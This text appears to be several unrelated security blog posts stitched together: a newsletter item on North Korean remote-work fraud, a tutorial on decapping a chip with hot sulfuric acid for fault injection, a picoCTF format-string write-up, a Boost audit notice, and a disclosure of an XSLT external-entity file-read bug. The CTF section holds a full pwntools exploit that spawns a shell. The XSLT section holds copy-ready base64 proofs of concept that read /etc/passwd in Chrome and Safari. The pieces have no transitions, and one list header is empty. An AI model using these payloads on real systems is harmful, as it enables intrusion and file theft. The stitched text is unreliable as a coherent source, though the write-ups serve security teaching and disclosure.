The U.S. Department of Justice charged three North Koreans with crimes related to impersonating others to obtain remote employment in the U.S., which in turn generated funding for North Koreaβs military. The three men, and another U.S. citizen, were charged with what the DOJ called βstaggering fraudβ in which they secured illicit work with several U.S. companies and government agencies using fraudulent identities from 60 real Americans. The U.S. citizen was allegedly placed laptops belonging to U.S. companies at various residences so the North Koreans could hide their true location. North Korean state-sponsored actors have used these types of tactics for years, often relying on social media networks like LinkedIn to fake their personal information and obtain jobs or steal sensitive information from companies. More than 300 companies may have been affected, with the perpetrators earning more than $6.8 million, most of which was used to βraise revenue for the North Korean government and its illicit nuclear program,β according to the DOJ. (ABC News, Bloomberg)Β
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on βUsing ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.β Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.Β Β
Bill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.Β
Most prevalent malware files from Talos telemetry over the past weekΒ
Recently, the automotive VR team has undertaken an effort to reproduce the software extraction attack against one of the target devices used during the Automotive Pwn2Own 2024 held in Tokyo, Japan. The electromagnetic fault injection (EMFI) approach was chosen to attempt an attack against the existing readout protection mechanisms. This blog post details preparatory steps to speed up the attack, hopefully considerably.
Electromagnetic fault injection
In general, fault injection attacks against hardware attempt to produce some sort of gain for an attacker by injecting faults into a device under attack by manipulating clock pulses, supply voltages, temperature, electromagnetic fields around the device, and aiming short light pulses at certain locations on the device. Of these vectors, EMFI stands out as probably the only attack approach that requires close to no modifications of the device under attack, with all action being conducted at a quite short distance. The attack then proceeds by moving an EM probe above the device in very small increments and triggering an EM pulse. With any luck, this would disturb the normal operation of the device under attack in just the right way to cause the desired effect.
Practically speaking, some sort of an EM pulse tool is required to conduct the attack. In this case, the PicoEMP was chosen for that purpose, which has been mounted on a modified 3D printer carriage.
However, the device in question (a GD32F407Z by GigaDevice) is physically rather large, with the package measuring 20mm by either side. Considering how long each individual attempt runs, the fact that the attempt needs to be retried multiple times to collect meaningful outcome statistics, and rather small increments used to move the probe, it would make sense to narrow down the search area as much as possible. Injecting EM faults into the epoxy encapsulation would not bring much of an effect.
Decapping
Unfortunately, the encapsulation is not transparent and does not allow for easy visual identification of the die in the package. This means that some way of getting the die out is required to measure it, or better yet, leave the die in the package so it will be possible to measure both the die dimensions and the position of the die within the package.
There are multiple approaches to decapsulation, or decapping for short:
Β·Β Β Β Β Β Mechanical: sanding or milling the package, cracking the encapsulation when heated Β·Β Β Β Β Β Chemical: applying acid to dissolve encapsulation Β·Β Β Β Β Β Thermal: placing the package in a furnace to burn encapsulation away Β·Β Β Β Β Β Optical: using a laser to burn encapsulation away in a precise manner
Of these, many require specialized equipment (mill, laser, furnace, fume hood for nitric acid), are time-consuming (sanding), or do not preserve important information (cracking the package). The choice was thus limited to what was available: hot sulfuric acid.
DANGER: Hot sulfuric acid is extremely corrosive; avoid spilling and wear proper PPE at all times.
DANGER: Sulfuric acid vapors are extremely corrosive; avoid inhaling and work in a well-ventilated area (fume hood or outside).
NOTE: Study relevant safety information including but not limited to materials handling, spill containment, and clean-up procedures before working with any hazardous chemicals.
NOTE: This blog post was written purely for educational purposes; any attempts to replicate the work are at your own risk.
Decapping process
As my home lab is, sadly, not equipped with a fume hood, all work was conducted outside.
The following tools were used:
Β·Β Β Β Β Β Sulfuric acid, 96% Β·Β Β Β Β Β A heat source in the form of a hot air station Β·Β Β Β Β Β A crocodile clip βhelping handsβ Β·Β Β Β Β Β A squirt bottle with acetone Β·Β Β Β Β Β A PE pipette Β·Β Β Β Β Β A waste container.
To begin, the device under attack is fixed in the clip, and a small drop of acid was applied with the pipette in the package center.
The device was then heated using the hot air station set to 200Β°C Β and a moderate air flow of around 40%. The aim of this process is to slowly dissolve the packaging epoxy. The device was heated until some fuming was observed from the drop and stopped before any bubbling would occur. If the acid gets hot enough to produce bubbles, the material will form a hard carbonized βcakeβ which will be problematic to remove. Unfortunately, this has been a problem before.
After the acid visibly darkened, which should take around 1 minute +- 50%, the heating was stopped, and the device was allowed to cool down somewhat. Then, the acid was washed off with acetone into the waste container. The device then was dried off with hot air to remove moisture.
The process was then repeated multiple times, with each iteration removing a bit of the packaging material. This was captured in the following series of images (more steps were taken than is presented here):
A stack of dice slowly emerged from the package: the larger one is the microcontroller itself, and the smaller one is the serial Flash memory holding all the programmed code and data. Unfortunately, the current process does not preserve the bond wires, rendering the device inoperable. Its operation was not required in our case. This could possibly be mitigated by using a 98% acid and anhydrous acetone β something to attempt in the future.
Measurements
The end result of the decapping process is pictured below.
Using a graphics editor, it is possible to take measurements in pixels of the package, the die, and the die positioning. This came out to be the following:
Β·Β Β Β Β Β Package size 1835x1835 pixels (measured) = 20x20 mm (known from the datasheet) Β·Β Β Β Β Β Pixels per mm: 91.75 Β·Β Β Β Β Β Die size 366x366 pixels (measured) = 4x4mm (computed) Β·Β Β Β Β Β Die offset from bottom left: 745x745 pixels (measured) = 8.12x8.12mm (computed)
The obtained numbers are immediately useful to program the EM probe motion restricted to the die area only. To find out how much experiment time this could save, letβs compute the areas: 4x4 = 16 mm2 for the die itself, and 20x20 = 400 mm2 for the whole package. This is 25 times decrease in the area and thus the experiment time.
Another approach that could avoid the decapping process is moving the probe in a spiral fashion, starting from the package center and moving outwards. This is of course possible to implement. However, the challenge here is the possibility of the two dice getting packaged side-to-side instead of being stacked like in this example β this would severely decrease the gain from this approach. Given the decapping only takes no more than 1-2 hours including cleanup, this was deemed well worth the information gained β and the die pictures obtained.
Conclusion
I hope you enjoyed this brief tutorial. Again, please take caution when using sulfuric acid or any other corrosive agents. Please dispose of waste materials responsibly. The world of hardware hacking offers many opportunities for discovery. Weβll continue to post guides and methodologies in future posts. Until then, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.
This blogpost covers a Capture The Flag challenge that was part of the 2024 picoCTF event that lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place in the global scoreboard. I decided to try and focus on the binary exploitation challenges. While having followed Corelanβs Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.
The challenge covers a format string vulnerability. This is a type of vulnerability where submitted data of an input string is evaluated as an argument to an unsafe use of e.g., a printf() function by the application, resulting in the ability to read and/or write to memory. The format string 3 challenge provides 4 files:
The vulnerable binary format-string-3 (download link)
The vulnerable binary source code format-string-3.c (download link)
A dynamic linker as the interpreter ld-linux-x86-64.so.2 (download link)
These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.
The steps of the final exploit:
Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a puts() function to simulate an information leak printed to stdout,
Dynamically calculate the base address of the libc library,
Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.
For step 2, itβs important to calculate the address dynamically (vs statically/hardcoded) since we can validate that the remote target loads modules at different addresses every time itβs being run. We can verify this by running the binary multiple times, which provides different memory addresses each time it is being run. This is due to the combination of Address Space Layout Randomization (ASLR) and the Position Independent Executable (PIE) compiler flag. The latter can be verified by using readelf on our binary since the binary is provided as part of the challenge.
Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.
Vulnerability Details
Background on string formatting
The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is directly passed and used as arguments to functions such as the C libraryβs printf() and its variants:
Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. Itβs recommended to use placeholders and string formatting such as printf("%s", input) instead.
The impact of a format string vulnerability can be divided in a few categories:
Ability to read values on the stack
Arbitrary memory reads
Arbitrary memory writes
In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.
Background on Global Offset Table
Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries β almost any binary running on a modern system.
The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.
When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:
If there is a GOT entry for function, it jumps to the address stored there;
If there is no GOT entry, it will resolve the address and jump there.
An example of the first option, where there is a GOT entry for function, is depicted in the visual below:
During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the programβs execution to arbitrary locations, such as shellcode or other parts of memory under our control.
Reviewing the source code
We are provided with the following source code:
#include<stdio.h>#define MAX_STRINGS 32char *normal_string = "/bin/sh";voidsetup() {setvbuf(stdin, NULL, _IONBF, 0);setvbuf(stdout, NULL, _IONBF, 0);setvbuf(stderr, NULL, _IONBF, 0);}voidhello() {puts("Howdy gamers!");printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);}intmain() {char *all_strings[MAX_STRINGS] = {NULL};charbuf[1024] = {'\0'};setup();hello(); fgets(buf, 1024, stdin); printf(buf);puts(normal_string);return0;}
C
Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:
# Making both the executable & linker executablechmodu+xformat-string-3ld-linux-x86-64.so.2# Executing the binary./format-string-3Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7f7c778eb3f0# This is our input, ending with <enter>testtest/bin/sh
Bash
We note a couple of things:
The binary provides us with the memory address of the setvbuf function in the libc library,
We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
The program finishes with a puts() function call that writes /bin/sh to stdout.
This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.
Vulnerability #1: Memory Leak
If we take another look at the source code above, we notice the following line in the hello() function:
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
C
Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.
We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.
Vulnerability #2: Format String Vulnerability
In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the puts(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:
Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.
Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:
# Executing the binary./format-string-3Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7f2818f423f0# This is our input, ending with <enter>%p# This is the output of the printf(buf) function call# This now prints back a value as a pointer0x7f28190a0963/bin/sh
Bash
The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!
Exploitation
We are now armed with an information leak that provides us a memory address and a format string vulnerability. Letβs try and combine these two to get code execution on our remote system.
Calculating input string offset
Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?
Letβs first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:
Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7fa5ae99b3f0AAAAAAAA%2$pAAAAAAAA0xfbad208b/bin/sh
Bash
Ideally (weβre explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$pβ¦) until %p points to your input string, but I did this using gdb:
# Open the program in gdbgdbformat-string-3# Put a breakpoint at the puts functionbputs# Run the programr# Continue the program since it will hit the breakpoint # on the first puts call in our program (Howdy Gamers !)c# Provide our input AAAAAAAA followed by <enter>AAAAAAAA
Bash
The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50Γ8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:
You could assume that 33 is the offset we need, but thereβs a catch:
On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.
This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:
The offset displayed on top of the visual indicates the relative offset from the start of the stack.
This offset now points exactly to the start of our input string:
Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7ff5ed4873f0AAAAAAAA%38$pAAAAAAAA0x4141414141414141/bin/sh
Bash
AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.
Now the (probably) more critical question to understand the answer to: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace our %p format specifier to read, to the %n format specifier?
Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7f4bfd3ff3f0AAAAAAAA%38$nzsh:segmentationfault./format-string-3
Bash
We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is⦠our input string itself.
This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:
Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.
By changing the format specifier, we now executed the following:
To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.
In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mappedβ¦). In the next part, weβre going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.
Local Exploitation
Letβs take a step back and think what we logically need to do. We need to:
Fetch the address of our setvbuf function in the libc library, provided by the program,
From this address, calculate the base address of libc,
Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
Continue execution to give control to the operator.
We are going to use the popular pwntools library for Python 3 to help us out quite a bit.
First, letβs attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:
from pwn import *p = process("./format-string-3")info(p.recvline()) # Fetch Howdy Gamers!info(p.recvuntil("libc: ")) # Fetch line right before setvbuffer address# Get setvbuffer addressbytes_setvbuf_address = p.recvline()# Convert output bytes to integer to store and work with our addresssetvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(),16)info("Received setvbuf address leak: %s", hex(setvbuf_leak))
Python
### Sample Output[+] Starting local process './format-string-3': pid 216507[*] Howdy gamers![*] Okay I'll be nice. Here's the address of setvbuf in libc: [*] Received setvbuf address leak: 0x7fb19acc83f0[*] Stopped process './format-string-3' (pid216507)
Bash
Second, we manually load libc to be able to set its base address to match our (now local, but future remote) target libc base address. We do this by subtracting the setvbuf function address from our manually loaded libc from our leaked function address:
...libc = ELF("./libc.so.6")info("Calculating libc base address...")libc.address = setvbuf_leak - libc.symbols['setvbuf']info("libc base address: %s", hex(libc.address))
Python
### Sample Output[+] Starting local process './format-string-3': pid 219013[*] Howdy gamers![*] Okay I'll be nice. Here's the address of setvbuf in libc: [*] Received setvbuf address leak: 0x7f25a21de3f0[*] Calculating libc base address...[*] libc base address: 0x7f25a2164000[*] Stopped process './format-string-3' (pid219013)
Bash
Finally, we can utilize the fmstr_payload function of pwntools to easily write:
What: the system function address in libc
Where: the puts entry in the GOT of our binary
Before actually executing and sending our payload, letβs make sure we understand whatβs happening. We start by noting down the addresses of:
the system function address in libc (0x7f852ddca760)
the puts entry in the GOT of our binary (0x404018)
next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:
You can divide the payload in different blocks, each serving the purpose we expected, although itβs quite a step up from what weβve manually done before. We can identify the pattern %mc%n$hhn (or ending lln), which:
Increases the output counter with m (note that the output counter does not necessarily start at 0)
Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.
Letβs now analyze the payload and calculate ourselves for 1 write operation to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:
Increases the output counter with 96h (hex) or 150d (decimal)
Writes the current value of the output counter (n, truncated by a long long (ll), or 8 bytes, to the memory address specified at offset 42:
As you can see in the payload above, offset 42 will correspond with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.
Youβll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since weβre working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.
After writing, the payload will continue with processing the next block %31c%48$hhn, which again increases the output counter and writes to the next offset (43). This offset contains our next address. The payload will continue until 6 blocks are executed, which corresponds to 6 %β¦%n statements.
Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:
...elf = context.binary = ELF('./format-string-3')info("Creating format string payload...")payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})# Ready to send payload!info("Sending payload...")p.sendline(payload)p.clean()# Give control to the shell to the operatorinfo("Payload successfully sent, enjoy the shell!")p.interactive()
Python
The fmtstr_payload function really does a lot of heavy lifting for us combined with the elf and libc references. It effectively writes the complete address of libc.symbols[βsystemβ] to the location where elf.got[βputsβ] originally was in memory by precisely modifying the output counter and executing memory write operations.
### Sample Output[+] Starting local process './format-string-3': pid 227263[*] Howdy gamers![*] Okay I'll be nice. Here's the address of setvbuf in libc: [*] Received setvbuf address leak: 0x7fa7c29473f0[*] '/home/kali/picoctf/libc.so.6'[*] Calculating libc base address...[*] libc base address: 0x7fa7c28cd000[*] '/home/kali/picoctf/format-string-3'[*] Creating format string payload...[*] Sending payload...[*] Payload successfully sent, enjoy the shell![*] Switching to interactive mode$whoamikali
Bash
We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!
Remote Exploitation
Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:
Note that youβll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.
### Sample Output...[*] Payload successfully sent, enjoy the shell![*] Switching to interactive mode$ ls flag.txtflag.txt
Python
That concludes the exploit, after which we can submit our flag. In a real world scenario, getting this kind of remote code execution would clearly be a great risk.
Conclusion
The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.
Format string vulnerabilities are less common than they used to be, however, our IoT colleagues assured me they encountered some recently during an IoT device assessment.
Thatβs why itβs important to adhere to:
Input Validation
Limit User-Controlled Input
Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
Secure Coding Practices
This should greatly limit the risk of format string vulnerabilities still being present in current day applications.
Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISOβs Red Team forward to deliver even better advisory to its clients.
Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.
TL;DR Shielder, with OSTIF and Amazon Web Services, performed a Security Audit on a subset of the Boost C++ libraries. The audit resulted in five (5) findings ranging from low to medium severity plus two (2) informative notices. The Boost maintainers of the affected libraries addressed some of the issues, while some other were acknowledged as accepted risks.
Today, we are publishing the full report in our dedicated repository.
Introduction In December 2023, Shielder was hired to perform a Security Audit of Boost, a set of free peer-reviewed portable C++ source libraries.
A year ago, I wondered what a malicious page with disabled JavaScript could do.
I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled?
Since I was too lazy to read the documentation, I started generating examples using ChatGPT.
XSL
The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. Itβs a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data.
In Chrome, XSL is supported and the library used is LibXSLT. Itβs possible to verify this by using system-property('xsl:vendor') function, as shown in the following example.
Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome:
The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications.
The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios.
<?xml-stylesheet href="get-location.xsl" type="text/xsl"?>
<!DOCTYPE test [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<test>
<getLocation test="ent"/>
</test>
Here is what you should see after uploading this code to your web server:
All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the βentβ entity, which is constructed using the relative path β?β.
XSL and Remote Content
Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML.
I asked ChatGPT many times about XSLβs content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it.
XML External Entities
Since XSL is XML-based, usage of XML External Entities should be the first option.
Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argumentβs file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol.
When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android!
Android + Chrome
Android + Chrome
Android + Chrome
Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions.
There was no chance that this wasnβt a vulnerability!
Here is a photo of my Smart TV, where the file reading works as well:
I compiled a table summarizing all my tests:
Test Scenario
Accessible Files
Android + Chrome
/etc/hosts
iOS + Safari
/etc/group, /etc/hosts, /etc/passwd
Windows + Chrome
β
Ubuntu + Chrome
β
PlayStation 4 + Chrome
β
Samsung TV + Chrome
/etc/group, /etc/hosts, /etc/passwd
The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user.
Other Tests
I have tested some applications that use LibXSLT and donβt have sandboxes.
App
Result
PHP
Applications that allow control over XSLTProcessor::importStylesheet data can be affected.
XMLSEC
The document() function did not allow http(s):// and data: URLs.
Oracle
The document() function did not allow http(s):// and data: URLs.
PostgreSQL
The document() function did not allow http(s):// and data: URLs.
The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT.
According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack.
POCs
You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later.
First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them:
The result of opening the xxe_all_tests/test.html page in an outdated Chrome
Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current userβs rights.
As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding:
Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article.
poc.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE svg [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<svg location="ent" />
poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE test [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<test1 location="ent"/>
All findings were immediately reported to the vendors.
Safari
Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000.
Chrome
Google implemented the patch and enforced security for documents loaded by the XSLβs document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000.